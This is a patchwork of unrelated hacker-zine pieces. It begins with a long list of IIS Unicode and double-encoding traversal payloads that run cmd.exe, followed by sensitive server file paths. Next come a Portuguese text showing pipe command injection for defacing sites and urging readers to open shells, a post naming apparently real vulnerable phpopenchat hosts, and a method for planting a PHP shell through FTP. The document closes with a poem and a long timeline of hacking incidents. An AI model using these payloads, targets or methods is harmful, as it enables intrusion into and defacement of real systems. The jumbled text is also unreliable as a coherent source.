/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:/_vti_log/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_private/form_results.txt
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/log/access.log
/logs/access.log
/msadc/Samples/SELECTOR/showcode.asp
/msads/Samples/SELECTOR/showcode.asp

-------------------------------------------------------------------------------------
6 - Nao seja um SC

SC = Script Kiddie

Muita gente vem usando de vul desse tipo que falei nesse txt para atos ridiculos, como
dar um echo numa index, fazer deface sem motivo e dizer q eh fodao, etc etc

> www.target.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=|echo Eu soh hacko > index.html|

Esse ato eh considerado um ato de script kiddie, eu tbm sou dessa opniao, pq vc deve usar
essa tecnica "ataque via strings" para coisas mais emocionante, para abrir shell, fucar
no server, etc etc
E c for fazer deface que pelo menos q seja por algum motivo e com uma index bunitinhA tbm... ;)

-------------------------------------------------------------------------------------
7 - Terminando

Nao chorem, mas o txt terminou... ;(

Agora serio, esse txt foi MUUUITO simples, apenas escrevi ele pq tinha muita gente
fazendo deface e dizendo que era o melhor e tal... lol entao fiquei com raivinhA desses kid...
Tadinho deles!! Agora quando vcs verem um deface podre por ae, e o cara for tipo um bacaca e
quizer vir pagar de bonzao, vcs ja podem imaginar como ele fez o deface neh? ;)

Com este txt espero tbm, alem de desmascaram os kid du brasil, mostrar um jeito facil
de abrir uma shell num server, assim aumentando mais o numero de fucador no brasil.. ;)

Eu ja vou indo, pois sao 1 da madruga, tou com sono e amanha tem q trabalhar.. Q MERDA.. hehe

Mas nao fiquem assim, eu ja estou pensando em algum outro assunto para escrever o
proximo txt, e por favor, caso tenha alguma ideia de algum assunto legal que vc gostaria de ver
no site do hax0rs lab(www.hax0rslab.org), mande me um mail > f0ul@hax0rslab.org

Pois escrever eh facil, escolher o assunto que eh o problema!!

Ateh mais...

Linux Penguin.

http://www.0xdeadbeef.info/stuff/linux_penguin.html

http://www.0xdeadbeef.info/

Choose Windows. Choose the eXPerience.
Choose flashy menus on your fucking server.
Choose Exchange. Choose IIS.
Choose Code Red, Nimda, the Lovebug, and a sexy Melissa...
Choose Outlook and end up wondering where your stupid .docs are.
Choose not to choose. Let Micro$oft do it for you.

But why would I want to do a thing like that?

I choose not to be chosen: I choose something else.
The reasons? There are too many reasons.
And who needs reasons when you've got Linux?

(from http://p.ulh.as/)

phpopenchat

Vul : phpopenchat Uma vul que ainda nao e muito publica a todos e mesmo aos que sabem de sua existencia, muitas vezes nao sabem como achar sites vuls . Exemplo de site vul : chat.grupoextra.com/index.php?language=it - Adicionando no host vul sua string ... /include/adodb/tests/tmssql.php?do=phpinfo Vul : http://chat.grupoextra.com/include/adodb/tests/tmssql.php?do=phpinfo Linux IPDAER0572MIA.usa.prod.interland.net 2.4.21-40.EL #1 Thu Feb 2 22:32:00 EST 2006 i686 Exemplos vuls : http://194.95.255.152/phpopenchat/include/adodb/tests/tmssql.php?do= Linux william2 2.6.8-24-default #1 Wed Oct 6 09:16:23 UTC 2004 i686 http://www.ghostpix.com/phpopenchat/include/adodb/tests/tmssql.php?do= Linux ns2.digitalnameserver.com 2.4.20-28.9 #1 Thu Dec 18 13:45:22 EST 2003 i686 http://english.eb.hc.edu.tw/phpopenchat/include/adodb/tests/tmssql.php?do= Linux content 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686 include : Anissina_Keiko f0r null

Xt0rti0n-Team.

lol

Root Stuff 2.

all the exploits has at the base the comodity of the admins or stupidity depends so ..
the ssh "remote exploit" isnt an exploit at all is just a scaner who search for open ports ( 22 in this case) and trying some users and passwords
in the case you have a nologin some ftp demons are using that for anonymous users so ...
IF the victim has an apache server up and running and is running with the default settings you can use the nologin to connect to ftp and puting there a php script called phpshell then connect at the apache server h t t p://ip/user~ then the apache will search for the right user in /home/ftp if thereis that dir there ( ussualy it is) the php script will display a zh shell in that webpage with egual chown with ftp demon
from here i think you all know what you have to do

hope i explain it well )

ps: is an old method i didnt test the new linux/kernels if there is still working but i dont think they change it to much

list of computer hacker incidents

1961.01.02 Caltech hackers (Fiendish Fourteen) hacked the stunt cards at the Rose Bowl (U of Wash vs Minnesota)
to say CALTECH instead of WASHINGTON and show a beaver instead of a husky
1971.00.00 John Draper (Cap'n Crunch) uses whistle (blue box) to access Ma Bell
1972.05.00 John Draper arrested for phone fraud
1981.00.00 Kevin Mitnick broke into the records of LA Unified School District, Monroe HS
1981.00.00 Captain Zap (Ian Murphy) breaks into AT&T and changed the internal clocks; cracked White House switchboard
1st person convicted of a computer crime; inspired the movie "Sneakers"
1981.05.30 Mitnick gets into Pac Bell's COSMOS phone center; takes passwords
1982.00.00 Chaos Computer Club founded
1982.00.00 Mitnick (Condor) cracks Pacific Telephone system and TRW; destroys data
1982.00.00 414 Gang raided; 6 teenagers arrested for breaking into Los Alamos National Lab and cancer center
1982.11.20 MIT hacked the Harvard-Yale football game with a black ball that had MIT written on it
1983.00.00 Mitnick arrested for gaining illegal access to the ARPAnet & Pentagon
1983.11.00 Fred Cohen creates the first virus at U of Southern California (Vax virus called VD); coined "computer virus"
1984.00.00 Kevin Poulsen (Dark Dante) arrested for breaking into the ARPAnet
1984.00.00 2600 hacker magazine begins regular publication by Emmanuel Goldstein (Eric Corley)
1985.00.00 First issue of Phrack magazine
1986.00.00 Chaos Computer Club cracks German government computer that had info about Chernobyl
1986.01.00 Pakistani Brain virus released; oldest malicious virus; affected the boot sector
1986.08.00 Dr Cliff Stoll tracks hackers (Chaos Computer Club) using Lawrence Berkeley Labs computers
1986.09.16 hackers break into Stanford Unix computers
1986.00.00 Congress enacts the Federal Computer Fraud and Abuse Act; illegal to access unauthorized federal computers
1987.07.05 hackers got secret access codes from Sprint
1987.09.18 hacker accesses AT&T computers, stealing $1 million worth of s/w
1987.09.28 hackers from Brooklyn penetrate MILNET
1987.10.15 Jerusalem memory resident virus; 1st file-infecting virus
1987.11.15 Lehigh virus; infected the command.com
1987.11.23 Chaos Computer Club hacks NASA's SPAN network (VMS 4.4)
1987.12.25 Christmas virus; 1st WAN virus; draws a Christmas tree on the screen while looking for network users
1987.12.00 Mitnick sentenced for stealing s/w from SCO
1988.06.15 Mac/Scores virus infected Macintosh 6.0.4
1988.09.00 "Prophet" cracks BellSouth AIMSX computer network
1988.11.02 Internet worm sent out by Robert T. Morris; overflowed fingerd buffer; 6,000 computers (Sun 3) affected
1st Internet worm; crashed 6,000 computers
1988.11.23 hacker cracks USAF Sperry 1160 computer in San Antonio
1988.12.16 Mitnick cracks MCI DEC network, steals VMS source code and XSafe
1989.00.00 Avenger written by Dark Avenger overwrites data onto a system's hard drive
1989.00.00 WDEF Mac virus corrupts hard drive and desktop files
1989.06.21 hacker cracks USAF satellite-positioning satellite
1989.07.22 Fry Guy cracks into MacDonald's mainframe; also stole credit cards
1989.10.16 WANK (Worms Against Nuclear Killers) worm attacked SPAN (NASA DECnet) VAX/VMS systems
1989.12.15 30 viruses discovered
1990.00.00 Kevin Poulson (Dark Dante) breaks into Pac Bell to be the 102nd caller on LA radio station; wins Porche
1990.00.00 Legion of Doom (LOD) and Masters of Deception are rival hacker groups
1990.00.00 Lamprecht (Minor Threat) cracks into warez site; write ToneLoc
1990.00.00 Frank Darden, Adam Grant, Bob Riggs, all of LOD arrested for cracking into BellSouth
1990.03.07 Denver hacker cracks NASA computer at Huntsville and Greenbelt
1990.03.21 hacker cracks Cliff Stoll's computer and adds message
1990.04.00 hackers from Netherlands penetrated DoD sites
1990.10.15 hackers break into British clearing banks
1991.00.00 Michelangelo virus; goes off on March 6
1991.01.00 Lamprecht (Minor Threat) hacks into Southwestern Bell; wrote ToneLoc
1991.03.00 hacker penetrates NASA, NIH, Bureau of Land Mgt, BBN
1991.04.21 Dutch hackers from Eindhoven break into US military computers
1991.06.21 Kevin Poulsen arrested for breaking into Pacific Bell phones
1991.07.00 Justin Petersen (Agent Steal) arrested for hacking into a bank's computer and transferring funds
1991.09.00 Justin Petersen released from prison to help FBI track crackers
1991.12.31 1,000 viruses exist in the wild
1992.00.00 Dallas computer maker discovers planted network sniffer on computer fax machine
1992.00.00 hackers get root at Eindhoven U of Technology in the Netherlands
1992.00.00 Morty Rosenfeld convicted after hacking into TRW, stealing 176 credit card reports and numbers
1992.02.00 Lamprecht (Minor Threat) steals circuit boards
1992.03.06 Michelangelo virus
1992.07.00 Lamprecht is caught attempting to sell stolen microprocessors
1992.11.00 Mitnick cracks into California Dept of Motor Vehicles
1992.12.00 hacker arrested for penetrating NASA, NIH, BBN, etc
1993.00.00 Masters of Deception (MOD) phone phreakers busted via wiretaps
1993.00.00 food scientist gained access to General Mills mainframe computers
1993.08.00 Justin Petersen (Agent Steal) arrested for computer fraud; broke into financial services company
1993.10.28 Randal Schwartz uses Crack at Intel to crack passwords
1994.00.00 Mark Abene (Phiber Optik) jailed for phone tampering
1994.02.00 hacker installs network sniffer and grabbed 100,000 names and passwords
1994.02.00 Texas Racing Commission computer hacked into
1994.02.01 hacker spoofed a Dartmouth professor using email to cancel tests
1994.03.23 DataStream Cowboy (Richard Pryce, age 16) broke into Rome Lab, Griffiss AFB from UK; used sniffer
1994.06.13 Citibank hacked by Vladimir Levin; $12 million in illegal transfers
1994.07.14 French student Damien Doligez cracks 40-bit RC4 encryption
1994.07.21 hackers crack into the Pentagon, altering and erasing records
1994.08.00 Justin Petersen electronically steals $150k from Heller Financial
1994.09.00 Netcom's credit card database was on-line an accessible to the unauthorized
1994.10.00 Michael Smyth, a regional manager at Pillsbury, fired due to intercepted email
1994.10.12 computer engineer cracks Marks & Spencer security file containing PIN numbers
1994.11.01 hacker cracks FBI's conference-calling system; made $250,000 in calls
1994.12.00 US Naval Academy computer system hacked; sniffer programs installed
1994.12.00 authors were targets of electronic mail bomb
1994.12.00 CrackBuster issued cancels for every message in alt.2600; flooded groups
1994.12.25 Mitnick cracks into Tsutomu Shimomura's security computers; stole s/w tools
1995.01.00 Chris Lamprecht (Minor Threat) incarcerated for hacking; banned from Internet
1995.01.27 Mitnick cracks into the Well; puts Shimomura's files there and Netcom credit card numbers
1995.02.15 Mitnick captured; broke into NORAD, PacBell, CA DMV, etc; had 20,000 credit card numbers
1995.04.00 Journalist David Pogue's AOL account deleted by hackers
1995.04.05 SATAN security tool released to the Internet
1995.05.05 Chris Lamprecht (Minor Threat) becomes 1st person banned from Internet
1995.06.02 hackers using Vanderbilt computers hack Air Force site - caught
1995.07.00 crackers tapped into Navy computer system and gained access to French and Allied data
1995.07.00 Julio Ardita of Argentina cracked into US military computers, Harvard, NASA
1995.07.25 Randal L Schwartz convicted of hacking under Oregon's Computer Crime Law
1995.07.28 hacker from Calgary freenet uses sendmail attack on gov sites
1995.08.04 hacker cracked NY Times Internet service, bringing it down
1995.08.15 several hackers crack Netscape 40-bit SSL; Damien Doligez used 120 computers
1995.09.11 Golle Cushing (Alpha Bits) arrested for selling credit card and cell phone info
1995.09.16 Berkeley students cracked Tower Records/Video computers; $20,000 charged
1995.09.17 Hackers discover weakness in Netscape random number generator; SSL cracked
1995.10.23 1st court-ordered wiretap on a computer network; at Harvard
1995.11.00 buffer overflow in Netscape Navigator host name made it vulnerable
1995.12.20 NASA Ames Research Center home page hacked
1995.12.28 Julio Ardita arrested in Argentina for hacking into Harvard
1996.00.00 Concept virus is 1st macro to affect Macs and PCs
1996.01.01 1st court authorized wiretap of an ISP; cell-fraud thru Compuserve
1996.01.15 Swedish computer hacker hacks into 911 phone system in FL
1996.01.22 Chaos taps cleartext transmission of banking information
1996.01.25 Russian pleads guilty of participating in Citibank wire fraud
1996.01.29 Digital Planet's web site for MGM/UA's "Hackers" Site hacked
1996.02.15 Hackers altered UK talking bus stops for use to the blind
1996.02.27 BerkshireNet in MA hacked; data erased and system shut down
1996.03.05 whitehouse.gov flooded with forged email; denial of service
1996.03.06 Boston ISPs hacked by U4ea; deleted Boston Globe web pages
1996.03.17 Telia, Sweden's biggest ISP, home page hacked
1996.04.05 N00gz indicted for computer fraud; accessed Bell, Sprint, SRI
1996.04.19 NYPD voice-mail system hacked
1996.04.27 Cambridge U hacked; confidential files broken into
1996.05.15 Datastream Cowboy from UK arrested for breaking into Rome Labs
1996.06.15 Two UK hackers charged with intruding into Lockheed computers
1996.06.20 14-year old arrested for using fraudulent credit card numbers
1996.06.25 hackers penetrate the public library network of a state
1996.07.05 1st known Excel virus, Laroux
1996.07.09 Ontario group gets into computers at a base in VA
1996.07.10 HS students crack a drink manufacturer's computer voice-mail system
1996.07.31 Tim Lloyd plants s/w time bomb at Omega Engineering in NJ; 1st federal computer sabotage case
1996.08.00 Fort Bragg soldier compromised military computer system; distributed passwords
1996.08.04 US hackers crack computers of the European parliament and commission
1996.08.16 Department of Justice home page hacked at www.usdoj.gov
1996.08.25 American Psychoanalytic Association hacked
1996.08.29 Nation of Islam web page hacked
1996.08.30 British Conservative Party webpage hacked
1996.09.00 Helsingius closes penet.fi anonymous remailer; Finnish police wants Scientology user
1996.09.06 hackers shut down PANIX, New York's Public Access Networks; SYN attack
1996.09.17 computer files with names of 4,000 AIDS patients taken in Florida
1996.09.18 CIA home page (www.odci.gov/cia) hacked by 5 Swedish hackers
1996.09.18 Internet Chess Club hit by hacker attack
1996.09.19 hacker cracks Palisades, NJ school system
1996.09.20 cancelbot attacks Usenet; 25,000 messages wiped out
1996.09.25 Kevin Mitnick indicted for damaging computers at USC, stealing s/w
1996.10.05 Wazzu virus released
1996.10.15 disgruntled employee wipes out all computer files at Digital Technologies Group
1996.10.22 hackers crack Czech banks; steal $2 million
1996.10.23 Fort Bragg, NC paratrooper hacked U.S. Army systems and gave passwords to China
1996.10.25 Florida Supreme Court home page hacked
1996.11.05 hackers attack anti-military site (www.insigniausa.com); erased files
1996.11.08 NY Times web site hit by SYN-flood attack; DoS
1996.11.10 Latin Summer Meeting home page hacked; porno and satire added
1996.11.12 Kriegsman furs web page hacked by animal rights activist; used phf hack
1996.11.17 hackers removed songs from computers at U2's Dublin studio
1996.11.21 Danish Research group get into computers at TX base
1996.11.22 NY city workers falsified computer records in largest tax fraud in NY
1996.11.26 Web site that provided news about Belarus leader was destroyed
1996.11.27 Nethosting and 1500 client home pages hacked
1996.11.29 Disgruntled computer technician brings down Reuters trading net in Hong Kong
1996.12.06 England's Labour Party web site hacked
1996.12.14 hackers attack WebCom, knocking out 3,000 web sites; used SYN-flood
1996.12.16 hackers crack Yale School of Medicine web page with the phf hack
1996.12.16 NASA home page hacked (Goddard); hack has both frames and JavaScript
1996.12.20 6 Danish hackers sentenced for attacking Pentagon computers
1996.12.23 Zhangyi Liu arrested in Dayton for cracking into WPAFB computers; had passwords
1996.12.29 Air Force home page hacked at DTIC; DefenseLINK shut down
1996.12.30 NASA home page hacked again by StOrM
1997.01.06 Croatians intrude into computers at Anderson AFB, Guam
1997.01.08 hacker crashed California state agency computer - Legal Employment Network
1997.01.13 Crack dot Com hacked; Doom, Quake, Golgotha source code downloaded
1997.01.15 hacker sentenced to prison for reprogramming Taco Bell computers
1997.01.17 Government of Victoria, Australia home page hacked
1997.01.29 phf hack from Belgium to TX base
1997.02.03 hackers spoof Eastern Avionics web page to grab credit card numbers
1997.02.05 German Chaos group uses ActiveX and Quicken to withdraw money
1997.02.07 Planned Parenthood stops use of plannedparenthood.com domain name
1997.02.10 Indonesia's Dept of Foreign Affairs homepage hacked
1997.02.15 AOL Court TV site with news on OJ Simpson trial hacked
1997.03.03 Loran International hit by a denial of service attack
1997.03.05 NASA homepage hacked
1997.03.09 NCAA WWW site hacked; pages changed by 14-year old
1997.03.12 IP floods of SMTP causes DoS at base in VA
1997.03.16 The Well hit by hackers. Passwords stolen, files deleted, trojans planted
1997.03.19 Spammer Cyber Promotions suffers hack attack
1997.04.00 internal hacker crashed Forbes Inc computer system; used "time bomb" and had passwords
1997.04.01 Malaysia's national telecommunications company home page hacked
1997.04.05 NASA web site hacked
1997.04.15 San Antonio's Express News web site server system hacked
1997.04.17 Cyber Promotions broken into, web page altered, password file stolen
1997.04.21 hacker provokes AOL to shut down Klan site
1997.04.26 Amnesty International homepage hacked
1997.04.27 British Conservative Party got hacked
1997.05.15 hacker floods NASA communications to Atlantis Shuttle/Mir mission; delays transmission
1997.05.23 Carlos Salgado grabs 100,000 credit card numbers from San Diego; used a sniffer
1997.05.27 The Lost World Jurassic Park homepage hacked
1997.05.29 hacker hit LAPD
1997.06.00 Netcom voice-mail hacked by "Mr Nobody"
1997.06.03 Delaware law enforcement officers get teenager cracking NASA
1997.06.11 USDA site hacked
1997.06.16 pro-spam hacker reported
1997.06.18 hackers in CO crack RSA's 56-bit DES encryption
1997.06.20 hackers caused denial of service to Microsoft's NT IIS web server
1997.06.25 Geocities frontpage got hacked
1997.06.30 hackers cause DoS on Microsoft NT server with header packets
1997.07.11 ESPN and nba.com (starwave) shut down after hacker emails shoppers credit info
1997.07.14 Danish computer guy finds hole in Netscape; asks for big reward money
1997.07.15 Canadian Security Intelligence Service got hacked
1997.07.18 hackers attack Swedish Crack-a-Mac site
1997.07.18 hackers attack MacInTouch - SYN flood
1997.08.01 Long Island group added a Trojan horse to hijack users' modem
1997.08.08 George Mason Univ students hacked their way into the Univ computers
1997.08.10 Cyper Promotions servers hacked
1997.08.16 Experian (TRW credit bureau) Internet allowed wrong credit reports
1997.08.18 Crack a Mac front page got hacked at hacke.infinit.se
1997.09.01 Altavista homepage got hacked (altavista.com)
1997.09.15 hackers hit coca-cola web site
1997.09.24 lince.com NT server got hakced
1997.09.25 Florida State School of Criminalogy NT server got hacked
1997.09.26 sterlingcorp.com NT server got hacked
1997.09.26 US Geological Survey NT server got hacked
1997.09.27 methodisthealth.com NT server got hacked
1997.09.30 ValueJet homepage got hacked
1997.10.01 hacker spoof SANS Security Digest newsletter; hacks into ClarkNet ISP
1997.10.05 hackers get into www.pentagon-ai.army.mil home page
1997.10.06 hacker breaks into Japan's Nippon Telegraph and Telephone (NTT)
1997.10.14 Yale e-mail account servers hacked; sniffer used
1997.10.19 RSA's RC5 56-bit encryption key cracked by Bovine effort
1997.10.31 Eugene Kashpureff arrested; redirected the NSI web page to his Alternic
1997.11.10 dragonserve.com hacked in Hong Kong
1997.11.11 DIU homepage hacked Claire Danes
1997.11.14 Spice Girls website hacked CodeZero
1997.11.15 China's Agricultural Univeristy hacked; condemned nuke tests
1997.11.21 Springfield College hacked Mr 9X (GM 288)
1997.11.23 SyMark Software hacked properstuff
1997.11.28 Local 2609 hacked Magica de Bin
1997.12.01 Secure Network Systems hacked Magica de Bin
1997.12.02 CA Dept of Fish and Game hacked
1997.12.04 e-mail bomb threat sent to Goodyear Tire store in WI Newman, Chad
1997.12.05 Fastcomm Australasia hacked Magica de Oct
1997.12.05 tourne.com hacked Claire Danes
1997.12.05 University of Technology, Sydney physics server hacked Magica
1997.12.06 five commercial sites hacked KAOS 97
1997.12.07 British Field Sports Society hacked Atrocity
1997.12.08 www.yahoo.com hacked pantz; h4gis
1997.12.09 Plumas Sierra, CA ISP hacked 404
1997.12.10 John Reilly signs hacked CyberToast
1997.12.10 OR Dept of Forestry website hacked CyberToast
1997.12.10 OneTouch, Inc hacked Claire Danes
1997.12.11 FOX network hacked; page pointed to NBC
1997.12.11 NetAdv hacked The Bookie
1997.12.11 HQ USAF homepage hacked; files renamed
1997.12.13 www.centerfold-aa.org hacked CyberToast
1997.12.13 Stanford homepage hacked
1997.12.13 35 sites hacked by the Legions of the Underground L.O.U.
1997.12.13 several com sites hacked CyberToast
1997.12.14 at least 7 com sites hacked newport
1997.12.14 Sarah Lawrence College and Diversified Data Systems hacked Claire Danes
1997.12.15 money shifted from 208 German bank accounts; security codes changed
1997.12.18 NetTime in Sweden hacked
1997.12.21 Progressive Woman website hacked properstuff
1997.12.21 Netstar in UK hacked KAOS 97
1997.12.21 Acura car dealership web site hacked properstuff
1997.12.21 Sierra On-Line games hacked
1997.12.22 Moody AFB homepage hacked
1997.12.22 ATEC software and www.ingmar.com hacked KAOS 97
1997.12.23 www.mpm.it homepage hacked
1997.12.25 www.lancasterhome.com hacked Claire Danes
1997.12.25 Rand J Trading homepage hacked StarCracker
1997.12.25 Net 4 Christ hacked newport
1997.12.26 U of Montreal Biomedical homepage hacked
1997.12.27 excelsior.arc.nasa.gov hacked Claire Danes
1997.12.29 several TV and radio websites hacked L.O.U.
1997.12.29 Taiwan web site hacked; bad ws_ftp files and password files
1997.12.30 First National Bank, Brookings, SD web site hacked
1997.12.30 www.k9breeders.com web site hacked
1997.12.31 Craig Enterprises hacked FTH
1997.12.31 at least 18 com and org sites hacked inhale
1997.12.31 18 com and net sites hacked newport
1997.12.31 Datatech Consulting, Sweden hacked 414
1997.12.31 China's Agricultural Univeristy hacked; FreeTibet Now
1998.02.19 Virgina schools hacked (Rockbridge)
1998.01.01 command to check passwords; went worldwide Abene, mark
1998.01.01 Quake web site hacked porno
1998.01.02 Janet Jackson and Rolling Stones web site hacked CodeZero
1998.01.02 BMW web site hacked
1998.01.03 Rapid City, SD ISP hacked
1998.01.03 www.hartnet.org hacked
1998.01.03 Association of Optometrists web site hacked OG (Older Generation)
1998.01.03 Marin, CA school hacked OptikLenz
1998.01.03 U of Costa Rica homepage hacked TikoZ
1998.01.03 Bolling AFB and Davis-Monthan AFB homepage hacked CodeZero
1998.01.04 Andorra NIC hacked
1998.01.04 Taiwan web site hacked; bad ws_ftp files and password files
1998.01.05 Sukura Japanes bank database broken into - customer data stolen Fujisawa
1998.01.05 TX A&M homepage hacked
1998.01.07 UNICEF homepage hacked
1998.01.07 Philips Communication hacked OptikLenz
1998.01.07 WV Network for Educational Telecomputing hacked OptikLenz
1998.01.08 Bureau of Labor Statistics flooded with fake info requests; shut down
1998.01.08 MD Board of Education hacked; files and payroll altered
1998.01.09 www.webbnet.com hacked Magica de Bin
1998.01.09 Gladsaxe Kommune, Denmark hacked Magica de Bin
1998.01.09 noemie.informatics.sintef.no hacked Virtus
1998.01.09 T/R systems hacked Virtus
1998.01.09 www.d-lab.com.ar (Argentina) hacked klan of dark afros
1998.01.10 Citizens Bank homepage hacked getwork guerillas
1998.01.10 ValuJet homepage hacked
1998.01.10 Easy Softwae hacked OptikLenz
1998.01.10 Mega-Bytes of Ohio hacked OptikLenz
1998.01.10 Reviewonline hacked OptikLenz
1998.01.10 Computer Tuto Training and Service hacked OptikLenz
1998.01.10 Youngstown Electric Company hacked OptikLenz
1998.01.11 ASI Net, Uruguay hacked Magica de Bin
1998.01.11 Silicon Investor NT server brought down by bonk DoS
1998.01.12 www.bass.com.my in Malaysia hacked
1998.01.12 ASI Net, Uruguay hacked Magica de Bin
1998.01.13 Boeing 401(k) temporary PIN numbers grabbed by hackers
1998.01.14 www.akam.tr (Turkey) hacked uberhacker
1998.01.14 Berkeley Instructional Technology Program hacked Magica de Bin
1998.01.14 WV Library Commission web site hacked
1998.01.15 www.emergent.com hacked L.O.U.
1998.01.15 military sites (.mil and some .gov) hacked - 200 servers Makareli, TooShort
1998.01.16 Tallahassee Freenet hacked; shut down to protect it
1998.01.16 Iowa Community College hacked by Zyklon (Eric Burns)
1998.01.16 SoftFair hacked bash
1998.01.16 Global Technology Marketing spam site killed
1998.01.17 www.scala.se software company hacked critic
1998.01.17 www.avd.nl hacked critic
1998.01.17 www.thebuzz.com KTBZ FM radio web site hacked
1998.01.18 over a dozen Indonesia web sites hacked LithiumError; ChiKo
1998.01.18 Industrial Dev Org of the UN hacked; unprotected Solaris box
1998.01.18 Branson school hacked
1998.01.18 Maine College hacked Zyklon
1998.01.18 Community Oriented On Line Networks hacked Mr 90
1998.01.18 www.kommanet.nl hacked critic
1998.01.19 www.kalnet.com hacked; running Apache on linux box
1998.01.20 Commission of the European Communities web site hacked Zyklon
1998.01.20 www.linkz.com web site hacked
1998.01.21 www.legislate.com hacked Noid
1998.01.21 www.bash.com hacked the hacker alliance
1998.01.22 www.kpc.lt hacked DaBoo
1998.01.22 Oakland, CA Unified School District webpage hacked tease
1998.01.24 www.kleiber.com hacked GiftGas
1998.01.24 Program One, Inc hacked SpiritWalker, Sn1per, GiftGas
1998.01.25 www.hartnet.org hacked OptikLenz
1998.01.25 Colorado Legal Eagles hacked pascal trio (zyklon)
1998.01.25 Univ of Seville server hacked Zyklon
1998.01.25 Ume University, Sweden hacked Toxic Edge
1998.01.26 www.homeguard.net hacked
1998.01.27 Walnut Ridge HS, Arkansas hacked OptikCore
1998.01.27 Virginia Commonwealth University hacked Zyklon
1998.01.27 Prairie View A&M Univ hacked Zyklon
1998.01.28 Internet traffic re-routed through USC computers as a test Postel, Jon
1998.01.28 www.datapark.net hacked GiftGas
1998.01.29 www.hackchat.com hacked Nation
1998.01.29 www.dragonserve.com hacked T.H.E.
1998.01.29 www.resopal.nl hacked SpiritWalker, Sn1per, SisterMoon
1998.01.29 www.connectos.com SpiritWalker, Sn1per, SisterMoon
1998.01.30 Calagary Unix Users Group hacked sreality and #pascal crew
1998.01.30 AllSeasons Travel hacked Claire Danes
1998.01.31 www.webbnet.com hacked xenon
1998.01.31 www.gpg.com hacked xenon
1998.01.31 www.branson.org hacked xenon
1998.02.01 www.netbank.net.tw hacked
1998.02.01 Langley AFB home page hacked Noid Crew
1998.02.01 Kuwait University home page and domain hacked
1998.02.01 www.tamu-commerce.edu hacked xenon
1998.02.02 www.pcconcepts.com hacked zipoff, Hosser
1998.02.04 mexico finance ministry hacked LoTek (High Tech Teens)
1998.02.04 www.ddd.fr hacked
1998.02.05 cccookies hacked Kalony
1998.02.07 dynatek infoworld hacked tech voodoo crew
1998.02.07 computer beratung direkt hacked the Amish Ninjas
1998.02.07 presage internet hacked JF Josh Freedaleman
1998.02.07 boimag in UK hacked JF Josh Freedaleman
1998.02.08 Uniformed Services University of Health Science hacked No|d Crew
1998.02.08 over 20 com sites hacked brain candy
1998.02.08 thermocret site hacked JF Josh Freedaleman
1998.02.08 nuvocom site hacked No|d Crew
1998.02.08 tvweather hacked tech voodoo crew
1998.02.08 danehio entertainment hacked Lord Acid
1998.02.08 century die hacked Lord Acid
1998.02.08 over a dozen sites hacked Bill Gates hackers
1998.02.09 SunSITE hacked in Hong Kong Magica de Bin
1998.02.10 www.knesset.gov.il hacked
1998.02.11 www.odi.com.pl (Poland) hacked TPSA team
1998.02.12 www.on-the-hook.com hacked Noid/TechVoodoo
1998.02.12 www.conceptsvisual.com hacked (concepts visual) Noid/TechVoodoo
1998.02.12 www.1792.com (arthur register) hacked Noid/TechVoodoo
1998.02.14 www.gov.com hacked LordSomer, The Hackers Layer
1998.02.16 www.vpac.org (virtual police) hacked lunar.shake.org
1998.02.16 www.phpages.com hacked Noid/TechVoodoo
1998.02.17 Alis Technologies hacked Magica de Bin
